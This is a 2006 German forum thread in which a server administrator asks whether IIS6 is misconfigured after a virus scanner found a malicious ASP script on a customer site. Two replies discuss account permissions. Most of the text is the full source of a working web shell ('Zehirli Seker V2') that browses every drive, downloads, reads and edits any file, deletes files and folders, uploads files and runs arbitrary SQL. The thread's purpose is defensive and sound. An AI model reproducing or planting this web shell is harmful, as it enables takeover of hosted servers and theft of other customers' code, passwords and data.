maddin70
12.07.2006, aktualisiert um 20:08:49 Uhr
view5229
view3
0
Goto Top

IIS6 Sicherheitsproblem

FrageMicrosoftWindows Server
mein server-virenscanner hat in einem meiner kundenwebs ein asp-script entdeckt, mit dem man via web auf alle verzeichnisse und
dateien des servers zugreifen kann.
hab ich hier irgendwo was falsch eingestellt oder ist das noch ein
sicherheitsproblem des IIS?
berechtigt für den webordner und die datei sind das IUSR_serverxxx konto und trotzdem
komme ich auf alle laufwerke des rechners, kann sogar asp-code anderer kundenwebs meines server ansehen und sogar die original asp-datei runterladen (somit auch passwörter von eventuellen mysql-cannects).....

server ist win2003/sp1 alle sicherheitsupdates sind installiert.

hier dir Code:

<%
on error resume next
Dim objFSO
Set objFSO = CreateObject ("Scripting.FileSystemObject")  
dosyaPath = "Zehir2.asp"  
status = Request("status")  
path   = Request("path")  
dPath  = Request("dPath")  
arama  = Request("txArama")  
dkayit = Request("dkayit")  
table  = Request("table")  
del    = Request("del")  
strSQL = Request("strSQL")  
pathfile = request("pathfile")  
'////////////////////////////////  
Function ReadBinaryFile(FileName)
  Const adTypeBinary = 1
  Dim BinaryStream
  Set BinaryStream = CreateObject("ADODB.Stream")  
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.LoadFromFile FileName
  ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then  
    Response.Buffer=True
    Set Fil = objFSO.GetFile(pathfile)

    Response.contenttype="application/force-download"  
 Response.AddHeader "Cache-control","private"  
    Response.AddHeader "Content-Length", Fil.Size  
    Response.AddHeader "Content-Disposition", "attachment; filename=" &   
Fil.name

 Response.BinaryWrite readBinaryFile(Fil.path)
    Set f = Nothing: Set Fil = Nothing
 response.End()
end if
'////////////////////////////////  
Class FileUploader
 Public  Files
 Private mcolFormElem

 Private Sub Class_Initialize()
  Set Files = Server.CreateObject("Scripting.Dictionary")  
  Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")  
 End Sub

 Private Sub Class_Terminate()
  If IsObject(Files) Then
   Files.RemoveAll()
   Set Files = Nothing
  End If
  If IsObject(mcolFormElem) Then
   mcolFormElem.RemoveAll()
   Set mcolFormElem = Nothing
  End If
 End Sub

 Public Property Get Form(sIndex)
  Form = ""  
  If mcolFormElem.Exists(LCase(sIndex)) Then Form = 
mcolFormElem.Item(LCase(sIndex))
 End Property

 Public Default Sub Upload()
  Dim biData, sInputName
  Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
  Dim nPosFile, nPosBound

  biData = Request.BinaryRead(Request.TotalBytes)
  nPosBegin = 1
  nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))

  If (nPosEnd-nPosBegin) <= 0 Then Exit Sub

  vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
  nDataBoundPos = InstrB(1, biData, vDataBounds)

  Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))  

   nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))  
   nPos = InstrB(nPos, biData, CByteString("name="))  
   nPosBegin = nPos + 6
   nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
   sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
   nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))  
   nPosBound = InstrB(nPosEnd, biData, vDataBounds)

   If nPosFile <> 0 And  nPosFile < nPosBound Then
    Dim oUploadFile, sFileName
    Set oUploadFile = New UploadedFile

    nPosBegin = nPosFile + 10
    nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
    sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
    oUploadFile.FileName = Right(sFileName, 
Len(sFileName)-InStrRev(sFileName, "\"))  

    nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))  
    nPosBegin = nPos + 14
    nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))

    oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, 
nPosEnd-nPosBegin))

    nPosBegin = nPosEnd+4
    nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
    oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)

    If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), 
oUploadFile
   Else
    nPos = InstrB(nPos, biData, CByteString(Chr(13)))
    nPosBegin = nPos + 4
    nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
    If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add 
LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
   End If

   nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, 
vDataBounds)
  Loop
 End Sub

 'String to byte string conversion  
 Private Function CByteString(sString)
  Dim nIndex
  For nIndex = 1 to Len(sString)
     CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
  Next
 End Function

 'Byte string to string conversion  
 Private Function CWideString(bsString)
  Dim nIndex
  CWideString =""  
  For nIndex = 1 to LenB(bsString)
     CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
  Next
 End Function
End Class

Function BinaryToString(Binary)
dim cl1, cl2, cl3, pl1, pl2, pl3
Dim L
cl1 = 1
cl2 = 1
cl3 = 1
L = LenB(Binary)
Do While cl1<=L
pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
cl1 = cl1 + 1
cl3 = cl3 + 1
if cl3>300 then
pl2 = pl2 & pl3
pl3 = ""  
cl3 = 1
cl2 = cl2 + 1
if cl2>200 then
pl1 = pl1 & pl2
pl2 = ""  
cl2 = 1
End If
End If
Loop
BinaryToString = pl1 & pl2 & pl3
End Function

Class UploadedFile
 Public ContentType
 Public FileName
 Public FileData

 Public Property Get FileSize()
  FileSize = LenB(FileData)
 End Property

 Public Sub SaveToDisk(sPath)
  Dim oFS, oFile
  Dim nIndex

  If sPath = "" Or FileName = "" Then Exit Sub  
  If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"  

  Set oFS = Server.CreateObject("Scripting.FileSystemObject")  
  If Not oFS.FolderExists(sPath) Then Exit Sub

  Set oFile = oFS.CreateTextFile(sPath & FileName, True)

  For nIndex = 1 to LenB(FileData)
      oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
  Next

  oFile.Close
 End Sub

 Public Sub SaveToDatabase(ByRef oField)
  If LenB(FileData) = 0 Then Exit Sub

  If IsObject(oField) Then
   oField.AppendChunk FileData
  End If
 End Sub

End Class

if status="-4" then  
 Dim Uploader, File
 Set Uploader = New FileUploader
 Uploader.Upload()
 Response.Write "<b>Dosya gönderilmiþtir" & Uploader.Form("fullname") &   
"</b>  
"  
 If Uploader.Files.Count = 0 Then
  Response.Write "Hiç Dosya Upload Edilemedi."  
 Else
  For Each File In Uploader.Files.Items
   File.FileName = request.Form("FNAME")  
   If Uploader.Form("saveto") = "disk" Then  
    File.SaveToDisk path
   End If
   Response.Write "Dosya Adý : " & File.FileName & "  
"  
   Response.Write "Dosya Boyutu : " & File.FileSize & " bytes  

"  
  Next
 End If
 Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time  
end if
'////////////////////////////////  
sub araBul(path_,ara_)
 on error resume next
 If Len(path_) > 0 Then
  cur = path_&"\"  
  If cur = "\\" Then cur = ""  
   parent = ""  
   If InStrRev(cur,"\") > 0 Then  
   parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))  
  End If
 Else
  cur = ""  
 End If

 Set f = objFSO.GetFolder(cur)

 Set fc = f.Files
 For Each f1 In fc
  if lcase(Right(f1.name,len(ara_)))=lcase(ara_) then
   downStr = "<font face=webdings size=5><a   
href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"  
   if lcase(ara_)="mdb" then  
    Response.Write downStr&"<font face=wingdings size=5><a   
href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font>   
* <a 
href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&"   
["&f1.size&"]"&"</a></b>  
"  
   else
    Response.Write downStr&"<font face=wingdings size=5><a   
href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a   
href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font>   
 - <a 
href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&"   
["&f1.size&"]"&"</a></b>  
"  
   end if
  end if
 Next

 Set fs = f.SubFolders
 For Each f1 In fs
  araBul f1.path,ara_
 Next
 Set f  = Nothing
 Set fc  = Nothing
 Set fs  = Nothing
end sub
%>
<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse 
vlink=Chartreuse>
<pre><center><p><b><font face="Times New Roman, Times, serif"   
size="3">Zehirli Þeker V2</font></b>  

POWERED BY ZEHIR HACKER
<b>IP/Cyber-WARRiOR Team</b></p><p><font face="Times New Roman, Times,   
serif" size="3"><b>Akýncýlar Grubu</b></font>  

<a href="http://www.Cyber-Warrior.Org">illegalPort.com</a> / <a   
href="http://www.Cyber-Warrior.Org">Cyber-WARRiOR.Org</a></p></center></pre>  
<script language=javascript>
var dosyaPath = "<%=dosyaPath%>"  
 // DRIVE ISLEMLERI
 function driveGo(drive_){
  location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date()  
 }
</script>
<%
 Response.Write "<table border=1 width=85% cellpadding=0 cellspacing=0><tr   
bgcolor=gray><td colspan=2 align=center><font color=white><b>Sistem 
Bilgileri</td></tr>"  
 Response.Write "<tr><td>Local Adres</td><td> " &   
request.servervariables("REMOTE_ADDR") & "</td></tr>"  
 Response.Write "<tr><td>User Agent</td><td> " &   
request.servervariables("HTTP_USER_AGENT") & "</td></tr>"  
 Response.Write "<tr><td>Server</td><td> " &   
request.servervariables("SERVER_NAME") & "</td></tr>"  
 Response.Write "<tr><td>IP</td><td> " &   
request.servervariables("LOCAL_ADDR") & "</td></tr>"  
 Response.Write "<tr><td>HTTPD</td><td> " &   
request.servervariables("SERVER_SOFTWARE") & "</td></tr>"  
 Response.Write "<tr><td>Port</td><td> " &   
request.servervariables("SERVER_PORT") & "</td></tr>"  
 Response.Write "<tr><td>Yol</td><td> " &   
request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"  
 Response.Write "<tr><td>Log Root</td><td> " &   
request.servervariables("APPL_MD_PATH") & "</td></tr>"  
 Response.Write "<tr><td>HTTPS</td><td> " & request.servervariables("HTTPS")   
& "</td></tr>"  
 Response.Write "</table>  
"  

 Response.Write "<table align=center border=1 width=150 cellpadding=0   
cellspacing=0><tr bgcolor=gray><td align=center><b><font 
color=white>Tipi</td><td align=center><b><font color=white>Sürücü</td></tr>"  
 for each drive_ in objFSO.Drives
  Response.Write "<tr><td>"  
  if drive_.Drivetype=1 then Response.write "Floppy"  
  if drive_.Drivetype=2 then Response.write "HardDisk"  
  if drive_.Drivetype=3 then Response.write "Remote HDD"  
  if drive_.Drivetype=4 then Response.write "CD-Rom"  
  Response.Write "</td><td align=center>"  
  Response.write "<input style='width:50%'   
onClick=""driveGo('"&drive_.DriveLetter&"');"" type=button   
value='"&drive_.DriveLetter&"'>"  
  Response.Write "</td></tr>"  
 next
 Response.Write "</table>  
"  

Response.Write "<form method=get action='"&DosyPath&"'>"  
Response.Write "<table border=1 cellpadding=0 cellspacing=0   
align=center><tr><td align=center bgcolor=gray>Hýzlý 
Eriþim</td></tr><tr><td>"  
Response.Write "<input type=hidden value='2' name=status><input type=hidden   
value='"&time&"' name=Time>"  
Response.Write "<input style='width:350' value='"&Path&"' name=Path><input   
type=submit value='Git' id=submit1 name=submit1>"  
Response.Write "</td></tr></table></form>  
"  

sub aramaUpload
Response.Write "<form method=get action='"&DosyPath&"'>"  
Response.Write "<table border=1 cellpadding=0 cellspacing=0   
align=center><tr><td align=center bgcolor=gray>Arama</td></tr><tr><td>"  
Response.Write "<input type=hidden value='12' name=status><input type=hidden   
value='"&time&"' name=Time>"  
Response.Write "<input type=hidden value='"&Path&"' name=Path><input   
style='width:350' value='mdb' name=txArama><input type=submit value='Git'>"  
Response.Write "</td></tr></table></form>  
"  

Response.Write "<FORM METHOD='POST' ENCTYPE='multipart/form-data'   
ACTION='"&DosyaPath&"?status=-4&Time="&time&"&Path="&path&"'>"  
Response.Write "<table border=1 cellpadding=0 cellspacing=0   
align=center><tr><td align=center bgcolor=gray>Dosya Upload</td></tr><tr><td 
align=center>"  
Response.Write "<INPUT TYPE=HIDDEN NAME='FULLNAME' VALUE='ZEHIR'>"  
Response.Write "<INPUT TYPE=HIDDEN NAME='saveto' VALUE='disk'>"  
Response.Write "<input style='width:350' type=File name=FILE1>"  
Response.Write "  
<INPUT TYPE=TEXT style='width:285' NAME='FNAME'   
VALUE='ZEHIR.TXT'>"  
response.Write "<input type=submit value='Upload'>"  
Response.Write "</td></tr></table></form>  
"  
Response.Write "</center>"  
end sub

SELECT CASE status
CASE 1 'Driver Open  
 aramaUpload
 Response.Write "<table width=100% ><tr>"  
 Path = Path & ":/"  
 Response.Write "<td valign=top>"  
 KlasorOku
 Response.Write "</td><td valign=top align=right>"  
 DosyaOku
 Response.Write "</td>"  
CASE 2 'Normal listeleme  
 aramaUpload
 Response.Write "<table width=100% ><tr>"  
 Response.Write "<td valign=top>"  
 KlasorOku
 Response.Write "</td><td valign=top align=right>"  
 DosyaOku
 Response.Write "</td>"  
CASE 3 'File Delete  
 objFSO.DeleteFile del
 Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time  
CASE 4 'Folder Delete  
 objFSO.DeleteFolder del
 Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time  
CASE 5 'Dosya içeriðini görüntüle  
 Response.Write "<table width=100% ><tr>"  
 set f = objFSO.OpenTextFile(path,1)
 Response.Write "<pre>"&f.readAll&"</pre>"  
 if err.number=62 then Response.Write "<script language=javascript>alert('Bu   
Dosya Okunamýyor\nSistem dosyasý olabilir')</script>":Response.End  
CASE 6 'Resim aç  
 Response.Write "<center><img ALT='IP HACK TEAM'   
src='"&resimYol(path)&"'></center>"  
CASE 7 'database tablo listele  
 Response.Write "<form method=get action='"&DosyPath&"' id=form1   
name=form1>"  
 Response.Write "<table border=1 cellpadding=0 cellspacing=0   
align=center><tr><td align=center bgcolor=gray>SQL 
Çalýþtýr</td></tr><tr><td>"  
 Response.Write "<input type=hidden value='9' name=status><input type=hidden   
value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"  
 Response.Write "<input style='width:350' value='' name=strSQL><input   
type=submit value='Çalýþtýr' id=submit1 name=submit1>"  
 Response.Write "</td></tr></table></form>  
"  

 Response.Write "<b><font size=3>Tablolar</font></br>  
"  
 Set objConn = Server.CreateObject("ADODB.Connection")  
 Set objADOX = Server.CreateObject("ADOX.Catalog")  
 objConn.Provider = "Microsoft.Jet.Oledb.4.0"  
 objConn.ConnectionString = Path
 objConn.Open
 objADOX.ActiveConnection = objConn

 For Each table in objADOX.Tables
  If table.Type = "TABLE" Then  
   Response.Write "<font face=wingdings size=5>4</font> <a   
href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a>  
"  
  End If
 Next
CASE 8 'database kayýt listele  
 Response.Write "<form method=get action='"&DosyPath&"' id=form1   
name=form1>"  
 Response.Write "<table border=1 cellpadding=0 cellspacing=0   
align=center><tr><td align=center bgcolor=gray>SQL 
Çalýþtýr</td></tr><tr><td>"  
 Response.Write "<input type=hidden value='9' name=status><input type=hidden   
value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"  
 Response.Write "<input style='width:350' value='' name=strSQL><input   
type=submit value='Çalýþtýr' id=submit1 name=submit1>"  
 Response.Write "</td></tr></table></form>  
"  

 Set objConn = Server.CreateObject("ADODB.Connection")  
 Set objRcs = Server.CreateObject("ADODB.RecordSet")  
 objConn.Provider = "Microsoft.Jet.Oledb.4.0"  
 objConn.ConnectionString = Path
 objConn.Open
 objRcs.Open table,objConn, adOpenKeyset , , adCmdText

 Response.Write "<table border=1 cellpadding=2 cellspacing=0   
bordercolor=543152><tr bgcolor=silver>"  
 for i=0 to objRcs.Fields.count-1
  Response.Write "<td><font   
color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"  
 next
 Response.Write "</tr>"  
 do while not objRcs.EOF
  Response.Write "<tr>"  
  for i=0 to objRcs.Fields.count-1
   Response.Write "<td>"&objRcs.Fields(i).Value&"</td>"  
  next
  Response.Write "</tr>"  
  objRcs.MoveNext
 loop
 Response.Write "</table>"  
CASE 9 'SQL Execute  
 Set objConn = Server.CreateObject("ADODB.Connection")  
 objConn.Provider = "Microsoft.Jet.Oledb.4.0"  
 objConn.ConnectionString = Path
 objConn.Open
 objConn.Execute strSQL
 Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time  
CASE 10 'Dosya Editleme  
 set f = objFSO.OpenTextFile(dPath,1)
 Response.Write "<center><form action='"&DosyPath&"?Time="&time&"'   
method=post>"  
 Response.Write "<input type=hidden name=status value='11'>"  
 Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"  
 Response.Write "<input type=hidden name=Path  value='"&Path &"'>"  
 Response.Write "<input type=submit value=Kaydet>  
"  
 Response.Write "<textarea name=dkayit style='width:90%;height:350'>"  
 Response.Write server.HTMLEncode(f.readAll)
 Response.Write "</textarea></form></center>"  
CASE 11 'Dosya Kayýt  
 set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
 saveTextFile.Write(dkayit)
 saveTextFile.close
 Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time  
CASE 12 'Dosya Arama  
 aramaUpload
 araBul path,arama
END SELECT
Response.Write "</tr></table>"  

sub DosyaOku
 Set f = objFSO.GetFolder(Path)
 Set fc = f.Files
 For Each f1 In fc
  dosyaAdi = f1.name
  num = InStrRev(dosyaAdi,".")  
  uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
  downStr = "<font face=webdings><a   
href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font>"  
  select case uzanti
  case "mdb"  
   Response.Write "<a   
href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>   
<font face=wingdings size=5>M  <a 
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>  
"  
  case "asp"  
   Response.Write "<a   
href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>   
<font face=wingdings size=5>± <a 
href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a><a   
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>  
"  
  case "jpg","gif"  
   Response.Write "<a   
href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>   
<font face=webdings size=5>¢</font><font face=wingdings size=5>  <a 
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>  
"  
  case else
   Response.Write "<a   
href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>   
<font face=wingdings size=5>2 <a 
href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a><a   
href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>"&downStr&"</font>  
"  
  end select
 Next
end sub

sub KlasorOku
 Set f = objFSO.GetFolder(Path)
 Set fc = f.SubFolders
 For Each f1 In fc
  Response.Write "<font face=wingdings size=5><a   
href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a>   
1</font> <b><a 
href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b>  
"  
 Next
end sub

function resimYol(path_)
 anayol = request.servervariables("APPL_PHYSICAL_PATH")  
 num = InStrRev(anayol,"\")  
 dim i,k,yollar,geriyol,girdimi
 i=0
 k=0
 girdimi=false
 while num>0
  anayol = left(anayol,num-1)
  geriyol = geriyol & "../"  
  num = InStrRev(anayol,"\")  
  girdimi=true
 wend
 'if girdimi=true then geriyol = left(geriyol,len(geriyol)-3)  

 path_ = Replace(path_,"\","/")  
 path_ = Replace(path_,"//","/")  
 path_ = Replace(path_,"//","/")  
 path_ = Replace(path_,"//","/")  
 path_ = Replace(path_,"//","/")  

 num = InStr(1,path_,"/")  
 while num>0
  folder = left(path_,num-1)
  path_ = Right(path_,len(path_)-num)
  if k<>0 then
   yollar = yollar & "/" & folder  
  end if
  num = InStr(1,path_,"/")  
  k = k + 1
 wend

 resimYol = Replace(geriyol & yollar & "/" & path_,"//","/")  
end function
Set fc = Nothing
Set objFSO = Nothing
Response.End
%>
ShareTeilen
Auf Facebook teilen Auf X (Twitter) teilen Auf Reddit teilen Auf Linkedin teilen

Content-ID: 35878

Url: https://administrator.de/forum/iis6-sicherheitsproblem-35878.html

Ausgedruckt am: 23.04.2025 um 15:04 Uhr

3 Kommentare
Neuester Kommentar
Goto Top
Raphael
Raphael 12.07.2006 um 14:44:16 Uhr
Goto Top
wie hast du getestet obs "funktioniert"?
Falls du das Script nicht in ein öffentliches Verzeichnis sondern in ein "geschützes" verzeichnis kopiert hast zum testen, dann hast du nicht die Rechte des öffentlichen Users sondern die Rechte des Users mit dem du dich eingelogt hast.
könnte an dem liegen.

kind regards
maddin70
maddin70 12.07.2006 um 14:52:01 Uhr
Goto Top
ich hab das file in ein öffentliches webverzeichnis gelegt, also mit www.xxx.xx/xxx.asp zum aufrufen. die öffentlichen ordner haben bei mir aber nur die IUSR_server- rechte. das ist ja der witz. brauchst nur mal das script in deinem space ablegen und testen.....
Raphael
Raphael 12.07.2006 um 20:08:49 Uhr
Goto Top
es gibt ja 2 Accounts für den IIS .. eines unter dem der IIS selber läuft und ein "anonymes" für den Besucher quasi ...
Evtl. hat der IIS-Account zuviele Rechte ...
oder hast du irgend ein Laufwerk für "everbody", bzw. "jeder" (bei deutschem Windows) freigegeben?

ansonsten kann ich's mir grad nicht erklären wie's gehen soll. Ich mag das Script bei mir nicht ausprobieren ;) (wirst du hoffentlich verstehen)
FrageMicrosoftWindows Server
Heiß diskutiert
MysticFoxDEWindows 11 - Unerträgliche Ressourcenverschwendung - groteske RAM ReservierungenMysticFoxDE - 76 KommentareMaba90Batch oder PS Skript startet Programm nur als Prozess ohne GUIMaba90 - 37 KommentareMysticFoxDEWindows 11 - Unerträgliche RessourcenverschwendungMysticFoxDE - 32 KommentarekreuzbergerGängelung, neu erfunden. Diesmal: SYNOLOGYkreuzberger - 31 KommentareNeurothikerMikrotik - wie ändere ich ein Interface von slave auf master?Neurothiker - 26 Kommentarepsimon87Serverschrank im Garten (in der "Gartenhütte")psimon87 - 19 KommentareManuManu2021Handelsregister.de nicht aufrufbarManuManu2021 - 16 Kommentaregerry56Netzwerk-Problem mit unterschiedlichen Betriebssystemengerry56 - 15 KommentareTenniscrackUSB Stick mit Windows 2 Go erstellenTenniscrack - 15 KommentarefloriaugsBackup Cloud - Empfehlungfloriaugs - 14 KommentareYan2021Thunderbolt USB-C auf USB-A Stecker bessere Lösung?Yan2021 - 14 KommentareNominisHeimnetzwerk - Aufteilung aktualisierenNominis - 13 KommentarekreuzbergerOrdner zerteilen in mehrere Teile mit vorgegebener Größekreuzberger - 11 Kommentare